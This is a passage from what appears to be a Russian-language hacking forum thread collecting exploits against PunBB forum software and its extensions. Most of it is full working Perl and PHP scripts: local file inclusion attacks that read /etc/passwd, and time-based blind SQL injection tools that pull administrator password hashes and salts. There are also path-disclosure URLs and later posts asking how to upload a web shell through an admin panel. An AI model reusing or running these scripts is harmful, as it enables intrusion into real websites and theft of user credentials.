    $array = array (
                        
    "functions_navlinks.php?pun_user[language]=$file",
                        
    "profile_send.php?pun_user[language]=$file",
                        
    "viewtopic_PM-link.php?pun_user[language]=$file",
                        
    "header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=$file",
                      ); 

        
    $write .= "GET /$host[1]/files/include/pms/$array[$i] HTTP/1.1\r\n";
        
    $write .= "Host: $host[0]\r\n";
        
    $write .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
        
    $write .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        
    $write .= "Accept-Language: en-us,en;q=0.5\r\n";
        
    $write .= "Accept-Encoding: gzip,deflate\r\n";
        
    $write .= "Connection: close\r\n\r\n";
        

       
        
        if(
    stristr($this->http_request($host[0],$write),'No such file or directory in'))
        {
          
    $i++;
        }
        else
        {
          if(
    $mode == "save"
          {
       
            
    $rand rand(0,99999);
            
    fclose(fwrite(fopen(getcwd().'/'.$rand.'.txt',"a+"),$this->http_request($host[0],$write)));
            
            echo 
    "[+] File $rand Saved Successfully!\r\n";
            echo 
    "[+] Exploit Terminated!\r\n";
            exit;
          
          }
          else
          {
            echo 
    $this->http_request($host[0],$write);
            exit;
          }
        }
      }
    }
     
    _________________________
    1 person likes this.
  11. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    PHP:
    #!/usr/bin/perl

    =about

        PunBB (PunPortal 0.1) Local File Inclusion Exploit
        --------------------------------------------------
        by athos - staker[at]hotmail[dot]it
        download mod http://www.punres.org/download.php?id=1108
        download cms http://punbb.org

        register globals = 1
        magic quotes gcp = 1
        
      
        
        File (include/login.php)
        
        1. <?php
        2.
        3. 
    // Show login if not logged in
        
    4. if($pun_user['is_guest'])
        
    5. {
        
    6. if(!isset($focus_element) || (isset($focus_element) && !in_array('login'$focus_element)))
        
    7. {
        
    8. 
        9. 
    // Load the language files
        
    10. require PUN_ROOT.'lang/'.$pun_user['language'].'/common.php';
        
    11. require PUN_ROOT.'lang/'.$pun_user['language'].'/login.php';
        
        
        
    $pun_user['is_guest'isn't declared
        $pun_user['
    language'] isn't declared
        
        
    include/user/login.php?pun_user[is_guest]=a&pun_user[language]=../../etc/passwd%00
        
        how to fix
    ?use the latest version (2.0
         
        
    Usageperl punbb.pl localhost/cms
        
    =cut


    use strict;
    use 
    warnings;
    use 
    IO::Socket;


    my $html undef;
    my $site $ARGV[0] or &help;
    my @take split /\//,$site;

    my ($host,$path) = @take;

    if(
    $site =~ /http:\/\/(.+?)/i) {
      print 
    STDOUT "Invalid URL\n";
      exit;
    }

    print 
    STDOUT "Local File (ex: ../../etc/passwd)\n";
    print 
    STDOUT "Local File: ";
      
    chomp(my $file = <STDIN>);

    if(
    not defined($file)) {
      print 
    STDOUT "File Not Defined!\n";
      exit;
    }


    my $evil "/include/user/login.php?pun_user[is_guest]=a&pun_user[language]=";

    my $sock = new IO::Socket::INET(
                                     
    PeerAddr => $host,
                                     
    PeerPort => 80,
                                     
    Proto    => 'tcp',
                                     
    Timeout  => 6,
                                  ) or die $!;   

    my $data "GET /${path}/${evil}${file}%00 HTTP/1.1\r\n".
               
    "Host: $host\r\n".
               
    "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".
               
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".
               
    "Accept-Language: en-us,en;q=0.5\r\n".
               
    "Accept-Encoding: gzip,deflate\r\n".
               
    "Connection: close\r\n\r\n";

    $sock->send($data);

    while(<
    $sock>) {
      
    $html .= $_;
    }           

    if(
    $html =~ /(No such file or directory|HTTP\/1.1 404 Not Found)/i) {
      print 
    STDOUT "Exploit Failed!\n";
      exit;
    }
    else {
      
    my $name int(rand(999)).'.txt';
      
      
    open(FILE,">",$name);
      print 
    FILE $html;
      
    close(FILE);
      
      print 
    STDOUT "Exploit Successfully!\n";
      print 
    STDOUT "$name saved!\n";
      exit;
    }


    sub help {
      print 
    STDOUT "PunBB (PunPortal 0.1) Local File Inclusion Exploit\n".
                   
    "by athos - staker[at]hotmail[dot]it\n".
                   
    "Usage: perl $0 [host/path]\n";
      exit;
    }
    http://www.milw0rm.com/exploits/7168 (с)
     
    _________________________
  12. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit

    PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit​


    Code:
    #!/usr/bin/perl
    #[0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit
    #Coded By Dante90, WaRWolFz Crew
    #Bug Discovered By: Dante90, WaRWolFz Crew
    
    use strict;
    use LWP::UserAgent;
    use HTTP::Cookies;
    
    use HTTP::Request::Common;
    use Time::HiRes;
    use IO::Socket;
    
    my ($UserName,$PassWord,$ID) = @ARGV;
    if(@ARGV < 3){
        &usage();
        exit();
    }
    my $Message = "";
    my ($Hash,$Time,$Time_Start,$Time_End,$Response);
    my($Start,$End);
    my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
    my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
    my $Method = HTTP::Request->new(POST => $Host);
    my $Cookies = new HTTP::Cookies;
    my $HTTP = new LWP::UserAgent(
                agent => 'Mozilla/5.0',
                max_redirect => 0,
                cookie_jar => $Cookies,
            ) or die $!;
    my $Referrer = "form_sent=1&pid=10174&poster=Dante90, WaRWolFz Crew&method=1&req_message=http://www.warwolfz.com/&submit=Invia";
    my $DefaultTime = request($Referrer);
    
    sub Login(){
        my $Login = $HTTP->post($Host.'login.php?action=in',
                    [
                        form_sent        => '1',
                        redirect_url    => 'forums.php',
                        req_username    => $UserName,
                        req_password    => $PassWord,
                        login => 'Login',
                    ]) || die $!;
    
        if($Login->content =~ /Logged in successfully./i){
            return 1;
        }else{
            return 0;
        }
    }
    if (Login() == 1){
        $Message = " * Logged in as: ".$UserName;
    }elsif (Login() == 0){
        $Message = " * Login Failed.";
        refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1");
        print " * Exploit Failed                                     *\n";
        print " ------------------------------------------------------ \n";
        exit;
    }
    
    sub Blind_SQL_Jnjection{
        my ($dec,$hex) = @_;
        return "Dante90, WaRWolFz Crew\" OR ASCII(SUBSTRING((SELECT `password` FROM `users` WHERE `id`=${ID}),${dec},1))=${hex}/*";
    }
    
    for(my $I=1; $I<=40; $I++){ #N Hash characters
        for(my $J=0; $J<=15; $J++){ #0 -> F
            my $Post = $HTTP->post($Host.'reputation.php?',[
                        form_sent    => '1',
                        pid            => '2',
                        poster        => Blind_SQL_Jnjection($I,$chars[$J]),
                        method        => '1',
                        req_message    => 'http://www.warwolfz.com/',
                        submit        => 'Submit',
                    ]) || die $!;
            $Time = request($Referrer);
            refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
            if($Post->content =~ /(The reputation has been successfully changed)/i){
                syswrite(STDOUT,chr($chars[$J]));
                $Hash .= chr($chars[$J]);
                $Time = request($Referrer);
                refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
                last;
            }
        }
        if($I == 1 && length $Hash < 1 && !$Hash){
            print " * Exploit Failed                                     *\n";
            print " ------------------------------------------------------ \n";
            exit;
        }
        if($I == 40){
            print " * Exploit Successed                                  *\n";
            print " ------------------------------------------------------\n ";
            system("pause");
        }
    }
    
    sub usage{
        system("cls");
        {
            print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n";
            print " ------------------------------------------------------ \n";
            print " * USAGE:                                             *\n";
            print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
            print " * perl name_exploit.pl [username] [password] [id]    *\n";
            print " ------------------------------------------------------ \n";
            print " *         Powered By Dante90, WaRWolFz Crew          *\n";
            print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
            print " ------------------------------------------------------ \n";
        };
        exit;
    }
    
    sub request{
        $Referrer = $_[0];
        $Method->content_type('application/x-www-form-urlencoded');
        $Method->content($Referrer);
        $Start = Time::HiRes::time();
        $Response = $HTTP->request($Method);
        $Response->is_success() or die "$Host : ", $Response->message,"\n";
        $End = Time::HiRes::time();
        $Time = $End - $Start;
        return $Time;
    }
    
    sub refresh{
        system("cls");
        {
            print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n";
            print " ------------------------------------------------------ \n";
            print " * USAGE:                                             *\n";
            print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
            print " * perl name_exploit.pl [username] [password] [id]    *\n";
            print " ------------------------------------------------------ \n";
            print " *         Powered By Dante90, WaRWolFz Crew          *\n";
            print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
            print " ------------------------------------------------------ \n";
        };
        print $_[0] ."\n";
        print " * Victime Site: " . $_[1] . "\n";
        print " * Default Time: " . $_[2] . " seconds\n";
        print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n";
        print " * BruteForcing N Char Hash: " . $_[6] . "\n";
        print " * SQL Time: " . $_[5] . " seconds\n";
        print " * Hash: " . $_[4] . "\n";
    }
    
    #WaRWolFz Crew
    
    # milw0rm.com [2009-07-28]
     
  13. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit

    PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit​


    Code:
    #!/usr/bin/perl
    #[0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit
    #Coded By Dante90, WaRWolFz Crew
    #Bug Discovered By: Dante90, WaRWolFz Crew
    #register_globals = On
    #magic_quotes_gpc = On
    
    
    use LWP::UserAgent;
    use HTTP::Cookies;
    use strict;
    
    my $EtcPasswd;
    my $TransversalDirectory = "./../../../../"; #Transversal Directory
    my $LFI = "etc/passwd"; #File Inject
    my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
    
    my $Referrer = "http://www.warwolfz.com/";
    
    my $Cookies = new HTTP::Cookies;
    my $UserAgent = new LWP::UserAgent(
    			agent => 'Mozilla/5.0',
    			max_redirect => 0,
    
    			cookie_jar => $Cookies,
    		) or die $!;
    
    sub Local_File_Inclusion{
    	my ($Directory,$Command) = @_;
    	return "./include/reputation/rep_profile.php?pun_user[language]=${Directory}${Command}%00";
    
    }
    
    my $Get = $UserAgent->get($HostName.Local_File_Inclusion($TransversalDirectory,$LFI));
    
    if ($Get->content =~ /No such file or directory in/i){
    	refresh($HostName, "Exploit Filed");
    	print " * Error extracting sensible data.\n";
    
    	print " * Exploit Failed                                     *\n";
    	print " ------------------------------------------------------ \n\n";
    }else{
    	$EtcPasswd = $Get->content;
    	open ( FILE , ">WaRWolFz.html" ) or die $!;
    
    	print FILE $EtcPasswd;
    	close ( FILE );
    	refresh($HostName, "File Saved");
    	print " * Exploit Successed                                  *\n";
    	print " ------------------------------------------------------\n\n";
    
    	system("pause");
    }
    
    sub usage{
    	system("cls");
    	{
    		print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n";
    		print " ------------------------------------------------------ \n";
    
    		print " * USAGE:                                             *\n";
    		print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
    		print " * perl name_exploit.pl                               *\n";
    
    		print " ------------------------------------------------------ \n";
    		print " *         Powered By Dante90, WaRWolFz Crew          *\n";
    		print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
    
    		print " ------------------------------------------------------ \n";
    	};
    	exit;
    }
    
    sub refresh{
    	system("cls");
    	{
    		print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n";
    
    		print " ------------------------------------------------------ \n";
    		print " * USAGE:                                             *\n";
    		print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
    
    		print " * perl name_exploit.pl                               *\n";
    		print " ------------------------------------------------------ \n";
    		print " *         Powered By Dante90, WaRWolFz Crew          *\n";
    
    		print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
    		print " ------------------------------------------------------ \n";
    
    	};
    	print " * Victime Site: " . $_[0] . "\n";
    	print " * Etc/Passwd: " . $_[1] . "\n";
    }
    
    #WaRWolFz
    
    # milw0rm.com [2009-07-30]
     
  14. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit

    Code:
    f (isset($_GET['secure_str']))
    {
    if (preg_match('~(\d+)f(\d+)~', $_GET['secure_str'], $match))
    {
    ...
    'WHERE'        => 'a.id = '.$attach_item.' AND (fp.read_forum IS NULL OR fp.read_forum = 1)
    Злоупотребление preg_match:(

    Code:
    #!/usr/bin/php
    <?php
    
    print_r('
    +---------------------------------------------------------------------------+
    Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit
    by puret_t
    mail: puretot at gmail dot com
    team: http://www.wolvez.org
    dork: "Powered by PunBB"
    +---------------------------------------------------------------------------+
    ');
    /**
    * works regardless of php.ini settings
    */
    if ($argc < 3) {
    print_r('
    +---------------------------------------------------------------------------+
    Usage: php '.$argv[0].' host path
    host:      target server (ip/hostname)
    path:      path to punbb
    Example:
    php '.$argv[0].' localhost /punbb/
    +---------------------------------------------------------------------------+
    ');
    exit;
    }
    
    error_reporting(7);
    ini_set('max_execution_time', 0);
    
    $host = $argv[1];
    $path = $argv[2];
    
    $pre = 'pun_';
    
    $benchmark = 200000000;
    $timeout = 10;
    
    echo "Plz Waiting...\nPassword:\n";
    /**
    * get pass
    */
    $j = 1;
    $pass = '';
    
    $hash[0] = 0; //null
    $hash = array_merge($hash, range(48, 57)); //numbers
    $hash = array_merge($hash, range(97, 122)); //az letters
    
    while (strlen($pass) < 40) {
    for ($i = 0; $i <= 255; $i ++) {
    if (in_array($i, $hash)) {
    $cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20password%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
    send();
    usleep(2000000);
    $starttime = time();
    send();
    $endtime = time();
    $difftime = $endtime - $starttime;
    if ($difftime > $timeout) {
    $pass .= chr($i);
    echo chr($i);
    break;
    }
    }
    if ($i == 255)
    exit("\nExploit Failed!\n");
    }
    $j ++;
    }
    
    echo "\nSalt:\n";
    /**
    * get salt
    */
    $j = 1;
    $salt = '';
    
    $hash[0] = 0; //null
    $hash = array_merge($hash, range(33, 126));
    
    while (strlen($salt) < 12) {
    for ($i = 0; $i <= 255; $i ++) {
    if (in_array($i, $hash)) {
    $cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20salt%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
    send();
    usleep(2000000);
    $starttime = time();
    send();
    $endtime = time();
    $difftime = $endtime - $starttime;
    if ($difftime > $timeout) {
    $salt .= chr($i);
    echo chr($i);
    break;
    }
    }
    if ($i == 255)
    exit("\nExploit Failed!\n");
    }
    $j ++;
    }
    
    exit("\nExpoilt Success!\nPassword Hash:\t$pass\nSalt:\t$salt\n");
    
    function send()
    {
    global $host, $path, $cmd;
    
    $data = "GET ".$path."misc.php?item=1&secure_str=".$cmd."  HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Connection: Close\r\n\r\n";
    
    $fp = fsockopen($host, 80);
    fputs($fp, $data);
    
    $resp = '';
    
    while ($fp && !feof($fp))
    $resp .= fread($fp, 1024);
    
    return $resp;
    }
    
    ?>
    
     
    1 person likes this.
  15. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    есть блайнд

    =================================================================
    PunBB <= 1.3.4 Pun_PM <= v1.2.6 Blind SQL Injection Vulnerability
    =================================================================


    PHP:
    #!/usr/bin/perl
    # [0-Day] PunBB <= 1.3.* Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit
    # Author/s: Dante90, WaRWolFz Crew
    # Created: 2009.07.30 after 0 days the bug was discovered.
    # Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, Shades Master, The:Paradox, V1R5, yeat
    # Greetings To: _ nEmO _, XaDoS, Necrofiend, Lutor, vagabondo, hacku, yawn, The_Exploited, Shotokan-The Hacker, _mRkZ_,
    #               Chuzz, init, plucky, SaRtE, Lupo
    # Thanks For Testing: BlAcK HaT, l3d
    # Web Site: www.warwolfz.org
    # My Wagend (Dante90): dante90wwz.altervista.org
    # Unit-X Project: www.unitx.net
    # ----
    # Why I've decided to publish this?
    # Because in "Package: Pun_PM <= v1.2.9" the bug was fixed.
    # ----
    # DETAILS
    # ./PunBB v1.3.*/extensions/pun_pm/functions.php
    # LINES: 504 -> 526
    #    function pun_pm_edit_message()
    #    {
    #        global $forum_db, $forum_user, $lang_pun_pm;
    #
    #        $errors = array();
    #
    #        // Verify input data
    #        $query = array(
    #            'SELECT'    => 'm.id as id, m.sender_id as sender_id, m.status as status, u.username as username, m.subject as subject, m.body as body',
    #            'FROM'        => 'pun_pm_messages m',
    #            'JOINS'        => array(
    #                array(
    #                    'LEFT JOIN'        => 'users AS u',
    #                    'ON'            => '(u.id = m.receiver_id)'
    #                ),
    #            ),
    #            'WHERE'        => 'm.id = '.$forum_db->escape($_GET['message_id']).' AND m.sender_id = '.$forum_user['id'].' AND m.deleted_by_sender = 0'
    #        );
    #
    #        ($hook = get_hook('pun_pm_fn_edit_message_pre_validate_query')) ? eval($hook) : null;
    #
    #        $result = $forum_db->query_build($query) or error(__FILE__, __LINE__);
    # ----
    # GET http://127.0.0.1/WaRWolFz/misc.php?section=pun_pm&pmpage=write&message_id=-1'
    # Error - PunBB
    # An error was encountered
    # The error occurred on line 525 in ./WaRWolFz/extensions/pun_pm/functions.php
    # Database reported: Errore di sintassi nella query SQL vicino a '\ AND m.sender_id = 2 AND m.deleted_by_sender = 0' linea 1 (Errno: 1064).

    use strict;
    use 
    warnings;

    use 
    LWP::UserAgent;
    use 
    HTTP::Cookies;
    use 
    HTTP::Request::Common;
    use 
    Time::HiRes;
    use 
    IO::Socket;

    my ($UserName,$PassWord,$ID) = @ARGV;
    if (@
    ARGV 3) {
        &
    usage();
        exit();
    }

    my $Message "";
    my $Hash "";
    my ($Time,$Time_Start,$Time_End,$Response);
    my ($Start,$End);
    my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
    my $Host "http://www.victime_site.org/path/"#Insert Victime Web Site Link
    my $Method HTTP::Request->new(GET => $Host);
    my $Cookies = new HTTP::Cookies;
    my $HTTP = new LWP::UserAgent(
                
    agent => 'Mozilla/5.0',
                
    max_redirect => 0,
                
    cookie_jar => $Cookies,
            ) or die $!;
    my $Referrer "http://www.warwolfz.org/";
    my $DefaultTime request($Referrer);

    sub request {
        
    $Referrer $_[0];
        
    $Method->referrer($Referrer);
        
    $Start Time::HiRes::time();
        
    $Response $HTTP->request($Method);
        
    $Response->is_success() or die "$Host : "$Response->message,"\n";
        
    $End Time::HiRes::time();
        
    $Time $End $Start;
        return 
    $Time;
    }

    sub Blind_SQL_Jnjection {
        
    my ($dec,$hex) = @_;
        return 
    "./misc.php?section=pun_pm&pmpage=write&message_id=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${ID})--";
    }

    sub Clear() {
        
    my $launch = $^O eq 'MSWin32' 'cls' 'clear';
        return 
    system($launch);
    }

    sub Login() {
        if (
    $ARGV[4] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) {
            
    $Cookies->proxy(['http''ftp'], 'http://'.$ARGV[4]) or die $!;
        }
        
    my $Get $HTTP->get($Host.'login.php');
        
    my $csrf_token "";
        if (
    $Get->content =~ /type="hidden" name="csrf_token" value="([a-f0-9]{1,40})/i) { #ByPassing csrf_token hidden input
            
    $csrf_token = $1;
        }
        my 
    $Login = $HTTP->post($Host.'login.php',
                    [
                        form_sent        => '1',
                        redirect_url    => 
    $Host.'login.php',
                        csrf_token        => 
    $csrf_token,
                        req_username    => 
    $UserName,
                        req_password    => 
    $PassWord,
                        save_pass        => '1',
                        login => 'Login',
                    ]) || die $!;

        if (
    $Login->content =~ /Verrai trasferito automaticamente ad una nuova pagina in 1 secondo/i) { #English Language: You should automatically be forwarded to a new page in 1 second.
            return 1;
        } else {
            return 0;
        }
    }

    sub usage {
        Clear();
        {
            print " 
    \[0-DayPunBB <= 1.3.4 PackagePun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";
            print " 
    ------------------------------------------------------ \n";
            print " 
    USAGE:                                             *\n";
            print " 
    cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
            print " 
    perl name_exploit.pl [username] [password] [id]    *\n";
            print " 
    * [proxyis optional (ex151.57.4.97:8080)         *\n";
            print " 
    ------------------------------------------------------ \n";
            print " 
    *         Powered By Dante90WaRWolFz Crew          *\n";
            print " 
    www.warwolfz.org dante90_founder[at]warwolfz.org *\n";
            print " 
    ------------------------------------------------------ \n";
        };
        exit;
    }

    sub refresh {
        Clear();
        {
            print " 
    \[0-DayPunBB <= 1.3.4 PackagePun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";
            print " 
    ------------------------------------------------------ \n";
            print " 
    USAGE:                                             *\n";
            print " 
    cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
            print " 
    perl name_exploit.pl [username] [password] [id]    *\n";
            print " 
    * [proxyis optional (ex151.57.4.97:8080)         *\n";
            print " 
    ------------------------------------------------------ \n";
            print " 
    *         Powered By Dante90WaRWolFz Crew          *\n";
            print " 
    www.warwolfz.org dante90_founder[at]warwolfz.org *\n";
            print " 
    ------------------------------------------------------ \n";
        };
        print 
    $_[0] ."\n";
        print " 
    Victime Site" . $_[1] . "\n";
        print " 
    * Default Time" . $_[2] . " seconds\n";
        print " 
    BruteForcing Hash" . chr($chars[$_[3]]) . "\n";
        print " 
    BruteForcing N Char Hash" . $_[6] . "\n";
        print " 
    SQL Time" . $_[5] . " seconds\n";
        print " 
    Hash" . $_[4] . "\n";
    }

    sub Main(){
        if (Login() == 1) {
            
    $Message = " Logged in as: ".$UserName;
        } elsif (Login() == 0) {
            
    $Message = " Login Failed.";
            refresh(
    $Message$Host$DefaultTime, "0", $Hash$Time, "1");
            print " 
    Exploit Failed                                     *\n";
            print " 
    ------------------------------------------------------ \n";
            exit;
        }
        for (my 
    $I=1; $I<=40; $I++) { #N Hash characters
            for (my 
    $J=0; $J<=15; $J++) { #0 -> F
                
    $Time_Start = time();
                my 
    $Get1 = $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
                
    $Time_End = time();
                
    $Time = request($Referrer);
                refresh(
    $Message$Host$DefaultTime$J$Hash$Time$I);
                if (
    $Time_End - $Time_Start > 6) {
                    
    $Time = request($Referrer);
                    refresh(
    $Message$Host$DefaultTime$J$Hash$Time$I);
                    if (
    $Time_End - $Time_Start > 6) {
                        syswrite(STDOUT,chr(
    $chars[$J]));
                        
    $Hash .= chr($chars[$J]);
                        
    $Time = request($Referrer);
                        refresh(
    $Message$Host$DefaultTime$J$Hash$Time$I);
                        last;
                    }
                }
            }
            if (
    $I == 1 && length $Hash < 1 && !$Hash) {
                print " 
    Exploit Failed                                     *\n";
                print " 
    ------------------------------------------------------ \n";
                exit;
            }
            if (
    $I == 40) {
                print " 
    Exploit Successfully Executed                      *\n";
                print " 
    ------------------------------------------------------\";
                system("
    pause");
            }
        }
    }

    Main();

    #WaRWolFz Crew



    # Inj3ct0r.com [2010-07-27]
    ===========================================================
    PunBB Automatic Image Upload 1.0 Shell Upload Vulnerability
    ===========================================================


     
    #15 547, 21 Sep 2010
    Last edited: 23 Sep 2010
  16. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    Code:
    [COLOR=DarkGreen]# Exploit Title: Punbb 1.3.4 Full Path Disclosure
    # Date: 07/11/2010
    # Author: SYSTEM_OVERIDE, OverSecurityCrew
    # Software Link: http://punbb.informer.com/
    # Vulnerability Type: Full Path Disclosure
    # Version: 1.3.4[/COLOR]
    
    Злоумышленник может узнать ROOTPATH.

    Уязвимые файлы:
    Code:
    [COLOR=DarkGreen]/search.php  /userlist.php moderate.php[/COLOR]
    Example:

    Code:
    http://www.site.com/[path]/search.php?action=search&keywords[]=&author[]=&search_in=all&sort_by=0&SORT_DAshow_as=DESC&topics=&search=Submit+search
    http://www.site.com/[path]/userlist.php?username[]=&show_group=-1&sort_by=username&sort_dir=ASC&search=Avvia+ricerca
    http://www.site.com/[path]/moderate.php?get_host[]=
     
    foozzione likes this.
  17. DarkMaster

    DarkMaster New Member

    Joined:
    17 Apr 2010
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    Подскажите, как зашеллить через админку (доступ в админку форму есть)
     
  18. SergioBlog

    SergioBlog New Member

    Joined:
    21 Jan 2011
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    Как узнать версию вообще можно?
     
  19. DarkMaster

    DarkMaster New Member

    Joined:
    17 Apr 2010
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    Войдете в админку - там четко написано какая версия. :)
    Я вот вошел, не пойму чё дальше делать, как шел залить.
     
  20. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Люди, подскажите сплоиты\баги PunBB 1.3

    Или же следующих плагинов (папка extensions)

    Спасибо